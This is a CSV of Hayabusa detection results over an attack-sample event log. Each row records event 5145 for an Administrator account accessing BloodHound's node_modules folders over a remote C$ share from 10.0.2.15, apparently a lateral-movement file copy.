2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
